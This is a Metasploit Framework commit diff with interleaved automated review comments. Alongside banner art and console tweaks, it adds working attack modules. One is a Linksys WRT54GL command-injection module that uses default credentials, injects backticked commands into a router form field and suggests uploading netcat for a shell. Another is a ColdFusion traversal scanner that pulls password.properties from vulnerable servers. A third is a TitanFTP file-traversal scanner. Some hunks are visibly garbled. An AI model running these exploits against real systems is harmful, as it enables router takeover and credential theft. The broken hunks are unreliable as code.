||| diff --git a/lib/msf/ui/logos/cow-head.txt b/lib/msf/ui/logos/cow-head.txt new file mode 100644 index 0000000000..d7746ac219 --- /dev/null +++ b/lib/msf/ui/logos/cow-head.txt 
@@ -0,0 +1,16 @@ +%whi + _---------. + .' ####### ;." + .---,. ;@ @@`; .---,.. +." @@@@@'.,'@@ @@@@@',.'@@@@ ". +'-.@@@@@@@@@@@@@ @@@@@@@@@@@@@ @; + `.@@@@@@@@@@@@ @@@@@@@@@@@@@@ .' + "--'.@@@ -.@ @ ,'- .'--" + ".@' ; @ @ `. ;' + |@@@@ @@@ @ . + ' @@@ @@ @@ , + `.@@@@ @@ . + ',@@ @ ; _____________ + ( 3 C ) /|___ / Metasploit! \ + ;@'. __*__,." \|--- \_____________/ + '(.,...."/%clr diff --git a/lib/msf/ui/logos/cowsay.txt b/lib/msf/ui/logos/cowsay.txt new file mode 100644 index 0000000000..15512d4556 --- /dev/null +++ b/lib/msf/ui/logos/cowsay.txt @@ -0,0 +1,8 @@ +# cowsay++ + ____________ +< metasploit > + ------------ + \ ,__, + \ (oo)____ + (__) )\ + ||--|| * diff --git a/lib/msf/ui/logos/figlet.txt b/lib/msf/ui/logos/figlet.txt new file mode 100644 index 0000000000..972e7363c0 --- /dev/null +++ b/lib/msf/ui/logos/figlet.txt @@ -0,0 +1,6 @@ + _ _ +/ \ /\ __ _ __ /_/ __ +| |\ / | _____ \ \ ___ _____ | | / \ _ \ \ +| | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -| +|_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_ + |/ |____/ \___\/ /\ \\___/ \/ \__| |_\ \___\ diff --git a/lib/msf/ui/logos/i-heart-shells.txt b/lib/msf/ui/logos/i-heart-shells.txt new file mode 100644 index 0000000000..5c1c64dd89 --- /dev/null +++ b/lib/msf/ui/logos/i-heart-shells.txt @@ -0,0 +1,8 @@ +%whiIIIIII %reddTb.dTb%clr _.---._ +%whi II %red4' v 'B%clr .'"".'/|\`.""'. +%whi II %red6. .P%clr : .' / | \ `. : +%whi II %red'T;. .;P'%clr '.' / | \ `.' +%whi II %red'T; ;P'%clr `. / | \ .' +%whiIIIIII %red'YvP'%clr `-.__|__.-' + +I love shells --egypt diff --git a/lib/msf/ui/logos/metasploit-shield.txt b/lib/msf/ui/logos/metasploit-shield.txt new file mode 100644 index 0000000000..41f1d971c7 --- /dev/null +++ b/lib/msf/ui/logos/metasploit-shield.txt 
@@ -0,0 +1,21 @@ +%clr +%bluMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM%clr +%bluMMMMMMMMMMM MMMMMMMMMM%clr +%bluMMMN$ vMMMM%clr +%bluMMMNl%clr %bldMMMMM MMMMM%clr %bluJMMMM%clr +%bluMMMNl%clr %bldMMMMMMMN NMMMMMMM%clr %bluJMMMM%clr +%bluMMMNl%clr %bldMMMMMMMMMNmmmNMMMMMMMMM%clr %bluJMMMM%clr +%bluMMMNI%clr %bldMMMMMMMMMMMMMMMMMMMMMMM%clr %blujMMMM%clr +%bluMMMNI%clr %bldMMMMMMMMMMMMMMMMMMMMMMM%clr %blujMMMM%clr +%bluMMMNI%clr %bldMMMMM MMMMMMM MMMMM%clr %blujMMMM%clr +%bluMMMNI%clr %bldMMMMM MMMMMMM MMMMM%clr %blujMMMM%clr +%bluMMMNI%clr %bldMMMNM MMMMMMM MMMMM%clr %blujMMMM%clr +%bluMMMNI%clr %bldWMMMM MMMMMMM MMMM#%clr %bluJMMMM%clr +%bluMMMMR%clr %bld?MMNM MMMMM%clr %blu.dMMMM%clr +%bluMMMMNm%clr %bld`?MMM MMMM`%clr %bludMMMMM%clr +%bluMMMMMMN%clr %bld?MM MM?%clr %bluNMMMMMN%clr +%bluMMMMMMMMNe%clr %bluJMMMMMNMMM%clr +%bluMMMMMMMMMMNm,%clr %blueMMMMMNMMNMM%clr +%bluMMMMNNMNMMMMMNx%clr %bluMMMMMMNMMNMMNM%clr +%bluMMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM%clr +%clr%bld http://metasploit.pro diff --git a/lib/msf/ui/logos/missile-command.txt b/lib/msf/ui/logos/missile-command.txt new file mode 100644 index 0000000000..5192490da2 --- /dev/null +++ b/lib/msf/ui/logos/missile-command.txt 
@@ -0,0 +1,30 @@ +%clr + ______________________________________________________________________________ +| | +| %bld%grnMETASPLOIT CYBER MISSILE COMMAND V4%clr | +|______________________________________________________________________________| + %yel\%clr %yel/%clr %yel/%clr + %yel\%clr . %yel/%clr %yel/%clr x + %yel\%clr %yel/%clr %yel/%clr + %yel\%clr %yel/%clr + %yel/%clr + %yel\%clr + %yel/%clr %yel/%clr + * %yel/%clr %yel/%clr + %yel/%clr . %yel/%clr + X %yel/%clr %yel/%clr X + %yel/%clr %red###%clr + %yel/%clr %red# %bld%%clr%red #%clr + %yel/%clr %red###%clr + . %yel/%clr + . %yel/%clr . %red*%clr . + %yel/%clr + * + + %red*%clr + + %bld^%clr +#### __ __ __ ####### __ __ __ #### +#### %yel/%clr %yel\%clr %yel/%clr %yel\%clr %yel/%clr %yel\%clr ########### %yel/%clr %yel\%clr %yel/%clr %yel\%clr %yel/%clr %yel\%clr #### +################################################################################ +################################################################################ +# %bldWAVE 4%clr ######## %bldSCORE 31337%clr ################################## %bldHIGH FFFFFFFF%clr # +################################################################################ + http://metasploit.pro%clr diff --git a/lib/msf/ui/logos/ninja.txt b/lib/msf/ui/logos/ninja.txt new file mode 100644 index 0000000000..70a5317a24 --- /dev/null +++ b/lib/msf/ui/logos/ninja.txt 
@@ -0,0 +1,30 @@ +%clr ######## # + ################# # + ###################### # + ######################### # + ############################ + ############################## + ############################### + ############################### + ############################## + # ######## # + %red##%clr %red###%clr #### ## + ### ### + #### ### + #### ########## #### + ####################### #### + #################### #### + ################## #### + ############ ## + ######## ### + ######### ##### + ############ ###### + ######## ######### + ##### ######## + ### ######### + ###### ############ + ####################### + # # ### # # ## + ######################## + ## ## ## ## + http://metasploit.pro%clr diff --git a/lib/msf/ui/logos/null-pointer-deref.txt b/lib/msf/ui/logos/null-pointer-deref.txt new file mode 100644 index 0000000000..38a532b541 --- /dev/null +++ b/lib/msf/ui/logos/null-pointer-deref.txt 
@@ -0,0 +1,37 @@ +%clr%whi +Unable to handle kernel NULL pointer dereference at virtual address 0xd34db33f +EFLAGS: 00010046 +eax: 00000001 ebx: f77c8c00 ecx: 00000000 edx: f77f0001 +esi: 803bf014 edi: 8023c755 ebp: 80237f84 esp: 80237f60 +ds: 0018 es: 0018 ss: 0018 +Process Swapper (Pid: 0, process nr: 0, stackpage=80377000) + +%bld +Stack: 90909090990909090990909090 + 90909090990909090990909090 + 90909090.90909090.90909090 + 90909090.90909090.90909090 + 90909090.90909090.09090900 + 90909090.90909090.09090900 + .......................... + cccccccccccccccccccccccccc + cccccccccccccccccccccccccc + ccccccccc................. + cccccccccccccccccccccccccc + cccccccccccccccccccccccccc + .................ccccccccc + cccccccccccccccccccccccccc + cccccccccccccccccccccccccc + .......................... + ffffffffffffffffffffffffff + ffffffff.................. + ffffffffffffffffffffffffff + ffffffff.................. + ffffffff.................. + ffffffff.................. +%clr + +%yelCode: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N4 00 00 00 00%clr +Aiee, Killing Interrupt handler +%redKernel panic: Attempted to kill the idle task! +In swapper task - not syncing%clr diff --git a/lib/msf/ui/logos/r7-metasploit.txt b/lib/msf/ui/logos/r7-metasploit.txt new file mode 100644 index 0000000000..f650282597 --- /dev/null +++ b/lib/msf/ui/logos/r7-metasploit.txt 
@@ -0,0 +1,16 @@ +%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +%% %% %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +%% % %%%%%%%% %%%%%%%%%%% http://metasploit.pro %%%%%%%%%%%%%%%%%%%%%%%%% +%% %% %%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +%% %%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +%%%%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +%%%% %% %%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%% %%%%% +%%%% %% %% % %% %% %%%%% % %%%% %% %%%%%% %% +%%%% %% %% % %%% %%%% %%%% %% %%%% %%%% %% %% %% %%% %% %%% %%%%% +%%%% %%%%%% %% %%%%%% %%%% %%% %%%% %% %% %%% %%% %% %% %%%%% +%%%%%%%%%%%% %%%% %%%%% %% %% % %% %%%% %%%% %%% %%% % +%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%% %%%%%%%%%%%%%% +%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%% +%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% diff --git a/lib/msf/ui/logos/test.rb b/lib/msf/ui/logos/test.rb new file mode 100644 index 0000000000..2a8e063414 --- /dev/null +++ b/lib/msf/ui/logos/test.rb @@ -0,0 +1,5 @@ + +here = File.expand_path(File.dirname(__FILE__)) + +puts "Hi I live #{here}!" + diff --git a/lib/msf/ui/logos/wake-up-neo.txt b/lib/msf/ui/logos/wake-up-neo.txt new file mode 100644 index 0000000000..1ee1779557 --- /dev/null +++ b/lib/msf/ui/logos/wake-up-neo.txt 
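Review bot: `lib/msf/ui/logos/test.rb` is a scratch script (`puts "Hi I live #{here}!"`) with no caller visible in this change and should not ship under `lib/`; drop it from the commit or turn it into a spec. If it was meant to verify the directory resolution that `Banner.readfile` relies on, a one-line comment saying so would at least explain its presence.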
@@ -0,0 +1,26 @@ +%whiCall trans opt: received. 2-19-98 13:24:18 REC:Loc + + Trace program: running + + wake up, Neo... + %bldthe matrix has you%clr + follow the white rabbit. + + knock, knock, Neo. + + (`. ,-, + ` `. ,;' / + `. ,'/ .' + `. X /.' + .-;--''--.._` ` ( + .' / ` + , ` ' Q ' + , , `._ \ + ,.| ' `-.;_' + : . ` ; ` ` --,.._; + ' ` , ) .' + `._ , ' /_ + ; ,''-,;' ``- + ``-..__``--` + + http://metasploit.pro%clr diff --git a/lib/msf/ui/logos/workflow.txt b/lib/msf/ui/logos/workflow.txt new file mode 100644 index 0000000000..a470eebd24 --- /dev/null +++ b/lib/msf/ui/logos/workflow.txt @@ -0,0 +1,21 @@ + %whi+-------------------------------------------------------+ + %whi| METASPLOIT by Rapid7 | + %whi+---------------------------+---------------------------+ + %whi| %blu__________________ %whi| | + %whi| %yel==c%blu(______(%yelo%blu(______(_%yel() %whi| %grn|""""""""""""|======[%red*** %whi| + %whi| %blu)%yel=%blu\ %whi| %grn| %whiEXPLOIT %grn\ %whi| + %whi| %blu// \\ %whi| %grn|_____________\_______ %whi| + %whi| %blu// \\ %whi| %grn|==[%whimsf >%grn]============\ %whi| + %whi| %blu// \\ %whi| %grn|______________________\ %whi| + %whi| %blu// %whiRECON %blu\\ %whi| %grn\(@)(@)(@)(@)(@)(@)(@)/ %whi| + %whi| %blu// \\ %whi| %grn********************* %whi| + %whi+---------------------------+---------------------------+ + %whi| o O o | %yel\'\/\/\/'/ %whi| + %whi| o O | %yel)%whi======%yel( %whi| + %whi| o | %yel.' %whiLOOT %yel'. %whi| + %whi| %red|^^^^^^^^^^^^^^|l%red___ %whi| %yel/ %grn_||__ %yel\ %whi| + %whi| %red| %whiPAYLOAD %red|%whi""\%red___, %whi| %yel/ %grn(_||_ %yel\ %whi| + %whi| %red|________________|__|)__| %whi| %yel| %grn__||_) %yel| %whi| + %whi| %red|(@)(@)"""**|(@)(@)**|(@) %whi| %yel" %grn|| %yel" %whi| + %whi| %yel= = = = = = = = = = = = %whi| %yel'--------------' %whi| + %whi+---------------------------+---------------------------+%clr 
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb index cb6aca1ca6..6d8fc9ae3a 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb @@ -342,7 +342,15 @@ class Console::CommandDispatcher::Core return end - print_status("Migrating to #{pid}...") + begin + server = client.sys.process.open + rescue TimeoutError => e + elog(e.to_s) + rescue RequestError => e + elog(e.to_s) + end + + server ? print_status("Migrating from #{server.pid} to #{pid}...") : print_status("Migrating to #{pid}") # Do this thang. client.core.migrate(pid) diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb index 37386cad66..6c4bd90f17 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb @@ -129,7 +129,7 @@ class Console::CommandDispatcher::Stdapi::Ui def cmd_screenshot( *args ) path = Rex::Text.rand_text_alpha(8) + ".jpeg" quality = 50 - view = true + view = false screenshot_opts = Rex::Parser::Arguments.new( "-h" => [ false, "Help Banner." ], diff --git a/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb b/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb new file mode 100644 index 0000000000..ea37ca8e21 --- /dev/null +++ b/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb 
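Review bot: The two rescue clauses around `client.sys.process.open` are identical and can be merged as `rescue TimeoutError, RequestError => e` followed by `elog(e.to_s)`. The two status messages on the next line are also inconsistent (`Migrating from #{server.pid} to #{pid}...` versus `Migrating to #{pid}` without the ellipsis). It is not visible here whether the handle returned by `client.sys.process.open` should be closed once its pid has been read — presumably not, but worth confirming against the Process API. The enclosing method continues outside the hunk.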
@@ -0,0 +1,202 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Linksys WRT54GL Remote Command Execution', + 'Description' => %q{ + Some Linksys Routers are vulnerable to OS Command injection. + You will need credentials to the web interface to access the vulnerable part + of the application. + Default credentials are always a good starting point. admin/admin or admin + and blank password could be a first try. + Note: This is a blind os command injection vulnerability. This means that + you will not see any output of your command. Try a ping command to your + local system for a first test. + + Hint: To get a remote shell you could upload a netcat binary and exec it. + WARNING: Backup your network and dhcp configuration. We will overwrite it! 
+ Have phun + }, + 'Author' => [ 'm-1-k-3' ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'URL', 'http://homesupport.cisco.com/en-eu/support/routers/WRT54GL' ], + [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-01' ], + [ 'URL', 'http://www.s3cur1ty.de/attacking-linksys-wrt54gl' ], + [ 'EDB', '24202' ], + [ 'BID', '57459' ], + [ 'OSVDB', '89421' ] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Jan 18 2013')) + + register_options( + [ + Opt::RPORT(80), + OptString.new('TARGETURI',[ true, 'PATH to OS Command Injection', '/apply.cgi']), + OptString.new('USERNAME',[ true, 'User to login with', 'admin']), + OptString.new('PASSWORD',[ false, 'Password to login with', 'password']), + OptString.new('CMD', [ true, 'The command to execute', 'ping 127.0.0.1']), + OptString.new('NETMASK', [ false, 'LAN Netmask of the router', '255.255.255.0']), + OptAddress.new('LANIP', [ false, 'LAN IP address of the router - CHANGE THIS', '1.1.1.1']), + OptString.new('ROUTER_NAME', [ false, 'Name of the router', 'cisco']), + OptString.new('WAN_DOMAIN', [ false, 'WAN Domain Name', 'test']), + OptString.new('WAN_MTU', [ false, 'WAN MTU', '1500']) + ], self.class) + end + + def run + #setting up some basic variables + uri = datastore['TARGETURI'] + user = datastore['USERNAME'] + rhost = datastore['RHOST'] + netmask = datastore['NETMASK'] + routername = datastore['ROUTER_NAME'] + wandomain = datastore['WAN_DOMAIN'] + wanmtu = datastore['WAN_MTU'] + + if datastore['LANIP'] !~ /1.1.1.1/ + #there is a configuration from the user so we use LANIP for the router configuration + ip = datastore['LANIP'].split('.') + else + #no configuration from user so we use RHOST for the router configuration + ip = rhost.split('.') + end + + if datastore['PASSWORD'].nil? 
+ pass = "" + else + pass = datastore['PASSWORD'] + end + + print_status("Trying to login with #{user} / #{pass}") + + begin + res = send_request_cgi({ + 'uri' => uri, + 'method' => 'GET', + 'basic_auth' => "#{user}:#{pass}" + }) + + unless (res.kind_of? Rex::Proto::Http::Response) + vprint_error("#{rhost} not responding") + return :abort + end + + if (res.code == 404) + print_error("Not Found page returned") + return :abort + end + + if [200, 301, 302].include?(res.code) + print_good("SUCCESSFUL LOGIN. '#{user}' : '#{pass}'") + else + print_error("NO SUCCESSFUL LOGIN POSSIBLE. '#{user}' : '#{pass}'") + return :abort + end + + rescue ::Rex::ConnectionError + vprint_error("#{rhost} - Failed to connect to the web server") + return :abort + end + + cmd = datastore['CMD'] + + print_status("Sending remote command: " + cmd) + + #cmd = Rex::Text.uri_encode(datastore['CMD']) + #original Post Request: + #data_cmd = "submit_button=index&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&" + #data_cmd << "lan_ipaddr=4&wait_time=0&need_reboot=0&ui_language=de&wan_proto=dhcp&router_name=#{routername}&" + #data_cmd << "wan_hostname=`#{cmd}`&wan_domain=#{wandomain}&mtu_enable=1&wan_mtu=#{wanmtu}&lan_ipaddr_0=#{ip[0]}&" + #data_cmd << "lan_ipaddr_1=#{ip[1]}&lan_ipaddr_2=#{ip[2]}&lan_ipaddr_3=#{ip[3]}&lan_netmask=#{netmask}&" + #data_cmd << "lan_proto=dhcp&dhcp_check=&dhcp_start=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&" + #data_cmd << "wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&" + #data_cmd << "wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&" + #data_cmd << "wan_wins_2=0&wan_wins_3=0&time_zone=-08+1+1&_daylight_time=1" + + vprint_status("using the following target URL: #{uri}") + + begin + res = send_request_cgi({ + 'uri' => uri, + 'method' => 'POST', + 'basic_auth' => "#{pass}:#{pass}", + #'data' => data_cmd, + + 'vars_post' => { + 'submit_button' => "index", 
+ 'change_action' => "1", + 'submit_type' => "1", + 'action' => "Apply", + 'now_proto' => "dhcp", + 'daylight_time' => "1", + 'lan_ipaddr' => "4", + 'wait_time' => "0", + 'need_reboot' => "0", + 'ui_language' => "de", + 'wan_proto' => "dhcp", + 'router_name' => "#{routername}", + 'wan_hostname' => "`#{cmd}`", + 'wan_domain' => "#{wandomain}", + 'mtu_enable' => "1", + 'wan_mtu' => "#{wanmtu}", + 'lan_ipaddr_0' => "#{ip[0]}", + 'lan_ipaddr_1' => "#{ip[1]}", + 'lan_ipaddr_2' => "#{ip[2]}", + 'lan_ipaddr_3' => "#{ip[3]}", + 'lan_netmask' => "#{netmask}", + 'lan_proto' => "dhcp", + 'dhcp_check' => "1", + 'dhcp_start' => "100", + 'dhcp_num' => "50", + 'dhcp_lease' => "0", + 'wan_dns' => "4", + 'wan_dns0_0' => "0", + 'wan_dns0_1' => "0", + 'wan_dns0_2' => "0", + 'wan_dns0_3' => "0", + 'wan_dns1_0' => "0", + 'wan_dns1_1' => "0", + 'wan_dns1_2' => "0", + 'wan_dns1_3' => "0", + 'wan_dns2_0' => "0", + 'wan_dns2_1' => "0", + 'wan_dns2_2' => "0", + 'wan_dns2_3' => "0", + 'wan_wins' => "4", + 'wan_wins_0' => "0", + 'wan_wins_1' => "0", + 'wan_wins_2' => "0", + 'wan_wins_3' => "0", + 'time_zone' => "-08+1+1", + '_daylight_time' => '1' + } + }) + rescue ::Rex::ConnectionError + vprint_error("#{rhost} - Failed to connect to the web server") + return :abort + end + + if res and res.code == 200 + print_status("Blind Exploitation - Response expected") + else + print_error("Blind Exploitation - Response don't expected") + end + print_status("Blind Exploitation - wait around 10 seconds until the configuration gets applied and your command gets executed") + print_status("Blind Exploitation - unknown Exploitation state") + end +end + diff --git a/modules/auxiliary/admin/ftp/titanftp_xcrc_traversal.rb b/modules/auxiliary/scanner/ftp/titanftp_xcrc_traversal.rb similarity index 91% rename from modules/auxiliary/admin/ftp/titanftp_xcrc_traversal.rb rename to modules/auxiliary/scanner/ftp/titanftp_xcrc_traversal.rb index 476ccc65f2..abe5c91903 100644 
--- a/modules/auxiliary/admin/ftp/titanftp_xcrc_traversal.rb +++ b/modules/auxiliary/scanner/ftp/titanftp_xcrc_traversal.rb @@ -11,6 +11,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Report + include Msf::Auxiliary::Scanner def proto 'ftp' @@ -28,7 +29,11 @@ class Metasploit3 < Msf::Auxiliary Although the daemon runs with SYSTEM privileges, access is limited to files that reside on the same drive as the FTP server's root directory. }, - 'Author' => 'jduck', + 'Author' => + [ + 'jduck', + 'Brandon McCann @zeknox ', + ], 'License' => MSF_LICENSE, 'References' => [ @@ -47,7 +52,7 @@ class Metasploit3 < Msf::Auxiliary end - def run + def run_host(ip) connect_login @@ -55,7 +60,8 @@ class Metasploit3 < Msf::Auxiliary res = send_cmd( ['XCRC', path, "0", "9999999999"], true ) if not (res =~ /501 Syntax error in parameters or arguments\. EndPos of 9999999999 is larger than file size (.*)\./) - raise RuntimeError, "Unable to obtain file size! File probably doesn't exist." + print_error("Unable to obtain file size! File probably doesn't exist.") + return end file_size = $1.to_i @@ -94,6 +100,7 @@ class Metasploit3 < Msf::Auxiliary fname = datastore['PATH'].gsub(/[\/\\]/, '_') p = store_loot("titanftp.traversal", "text/plain", "rhost", file_data, fname) + print_status("Saved in: #{p}") vprint_status(file_data.inspect) disconnect diff --git a/modules/auxiliary/scanner/http/cold_fusion_version.rb b/modules/auxiliary/scanner/http/cold_fusion_version.rb index 92aaba751e..64bb92f12a 100644 --- a/modules/auxiliary/scanner/http/cold_fusion_version.rb +++ b/modules/auxiliary/scanner/http/cold_fusion_version.rb @@ -36,11 +36,10 @@ class Metasploit3 < Msf::Auxiliary end end - len = (response.body.length > 2500) ? 2500 : response.body.length return nil if response.body.length < 100 title = "Not Found" - if(response.body =~ /(.+)<\/title\/?>/i) + if(response.body =~ /(.+)<\/title\/?>/im) title = $1 title.gsub!(/\s/, '') end 
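Review bot: The early `return` added in the `@@ -55,7 +60,8 @@` hunk leaves the FTP session opened by `connect_login` at the top of `run_host` connected, because `disconnect` is only reached at the end of the method (visible in the `@@ -94,6 +100,7 @@` hunk); with the new Scanner mixin this now leaks one connection per host that lacks the file. Wrap the body so the socket is always released, e.g. `begin ... ensure disconnect end` around the method body, or call `disconnect` before the `return`. The context line in the last hunk passes the literal string `"rhost"` as the host argument to `store_loot`, so the loot is filed under a host literally named "rhost" rather than the scanned address; now that `run_host(ip)` is in scope, `store_loot("titanftp.traversal", "text/plain", ip, file_data, fname)` files it correctly. run_host's body continues outside these hunks.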
@@ -51,9 +50,11 @@ class Metasploit3 < Msf::Auxiliary if(response.body =~ />\s*Version:\s*(.*)<\/strong\>\s+ url, 'method' => 'GET', - }, 5) + }) return if not res or not res.body or not res.code res.body.gsub!(/[\r|\n]/, ' ') diff --git a/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb b/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb index f02623f760..caa4201756 100644 --- a/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb +++ b/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb @@ -29,8 +29,12 @@ class Metasploit3 < Msf::Auxiliary to have directory traversal protections in place, subsequently this module does NOT work against ColdFusion 9. Adobe did not release patches for ColdFusion 6.1 or ColdFusion 7. + + It is not recommended to set FILE when doing scans across a group of servers where the OS + may vary; otherwise, the file requested may not make sense for the OS + }, - 'Author' => [ 'CG' ], + 'Author' => [ 'CG', 'nebulus' ], 'License' => MSF_LICENSE, 'References' => [ 
@@ -45,40 +49,149 @@ class Metasploit3 < Msf::Auxiliary register_options( [ - OptString.new('URL', [ true, "URI Path", '/CFIDE/administrator/enter.cfm']), - OptString.new('PATH', [ true, "traversal and file", '../../../../../../../../../../ColdFusion8/lib/password.properties%00en']), + OptString.new('FILE', [ false, 'File to retrieve', '']), + OptBool.new('FINGERPRINT', [true, 'Only fingerprint endpoints', false]) ], self.class) end + def fingerprint(response) + + if(response.headers.has_key?('Server') ) + if(response.headers['Server'] =~ /IIS/ or response.headers['Server'] =~ /\(Windows/) + os = "Windows (#{response.headers['Server']})" + elsif(response.headers['Server'] =~ /Apache\//) + os = "Unix (#{response.headers['Server']})" + else + os = response.headers['Server'] + end + end + + return nil if response.body.length < 100 + + title = "Not Found" + response.body.gsub!(/[\r\n]/, '') + if(response.body =~ /(.+)<\/title\/?>/i) + title = $1 + title.gsub!(/\s/, '') + end + return nil if( title == 'Not Found' or not title =~ /ColdFusionAdministrator/) + + out = nil + + if(response.body =~ />\s*Version:\s*(.*)<\/strong\>\s+ url+locale+trav, - 'method' => 'GET', - 'headers' => - { + url = '/CFIDE/administrator/index.cfm' + + res = send_request_cgi({ + 'uri' => url, + 'method' => 'GET', 'Connection' => "keep-alive", 'Accept-Encoding' => "zip,deflate", - }, - }, -1) + }) - if (res.nil?) 
- print_error("no response for #{ip}:#{rport} #{url}") - elsif (res.code == 200) - #print_error("#{res.body}")#debug - print_status("URL: #{ip}#{url}") - if match = res.body.match(/\(.*)\<\/title\>/im); - fileout = $1 - print_status("FILE OUTPUT:\n" + fileout + "\r\n") + return if not res or not res.body or not res.code + + if (res.code.to_i == 200) + out = fingerprint(res) + print_status("#{ip} #{out}") if out + return if (datastore['FINGERPRINT']) + + if(out =~ /Windows/ and out =~ /MX6/) + trav = '..\..\..\..\..\..\..\..\..\..\CFusionMX\lib\password.properties%00en' + elsif(out =~ /Windows/ and out =~ /MX7/) + trav = '..\..\..\..\..\..\..\..\..\..\CFusionMX7\lib\password.properties%00en' + elsif(out =~ /Windows/ and out =~ /ColdFusion 8/) + trav = '..\..\..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties%00en' + elsif(out =~ /ColdFusion 9/) + print_status("#{ip} ColdFusion 9 is not vulnerable, skipping") + return + elsif(out =~ /Unix/ and out =~ /MX6/) + trav = '../../../../../../../../../../opt/coldfusionmx/lib/password.properties%00en' + elsif(out =~ /Unix/ and out =~ /MX7/) + trav = '../../../../../../../../../../opt/coldfusionmx7/lib/password.properties%00en' + elsif(out =~ /Unix/ and out =~ /ColdFusion 8/) + trav = '../../../../../../../../../../opt/coldfusion8/lib/password.properties%00en' + else + if(res.body =~ /Adobe/ and res.body =~ /ColdFusion/) + print_error("#{ip} Fingerprint failed, FILE not set...aborting") + else + return # probably just a web server + end + end else - '' + return # silent fail as it doesnt necessarily at this point have to be a CF server + end + end + + # file specified or obtained via fingerprint + if(trav !~ /\.\.\/\.\.\// and trav !~ /\.\.\\\.\.\\/) + # file probably specified by user, make sure to add in actual traversal + trav = '../../../../../../../../../../' << trav << '%00en' + end + + locale = "?locale=" + + urls = ["/CFIDE/administrator/enter.cfm", "/CFIDE/wizards/common/_logintowizard.cfm", 
"/CFIDE/administrator/archives/index.cfm", + "/CFIDE/administrator/entman/index.cfm", "/CFIDE/administrator/logging/settings.cfm"] + # "/CFIDE/install.cfm", haven't seen where this one works + + out = '' # to keep output in synch with threads + urls.each do |url| + res = send_request_raw({ + 'uri' => url+locale+trav, + 'method' => 'GET', + 'headers' => + { + 'Connection' => "keep-alive", + 'Accept-Encoding' => "zip,deflate", + }, + }) + + + if (res.nil?) + print_error("no response for #{ip}:#{rport} #{url}") + elsif (res.code == 200) + #print_error("#{res.body}")#debug + print_status("URL: #{ip}#{url}#{locale}#{trav}") + if res.body.match(/\(.*)\<\/title\>/im) + fileout = $1 + if(fileout !~ /Login$/ and fileout !~ /^Welcome to ColdFusion/ and fileout !~ /^Archives and Deployment/) + print_good("#{ip} FILE: #{fileout}") + break + end + end + else + next if (res.code == 500 or res.code == 404 or res.code == 302) + print_error("#{ip} #{res.inspect}") end - else - '' end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError diff --git a/modules/auxiliary/scanner/http/joomla_pages.rb b/modules/auxiliary/scanner/http/joomla_pages.rb new file mode 100755 index 0000000000..77218063a5 --- /dev/null +++ b/modules/auxiliary/scanner/http/joomla_pages.rb 
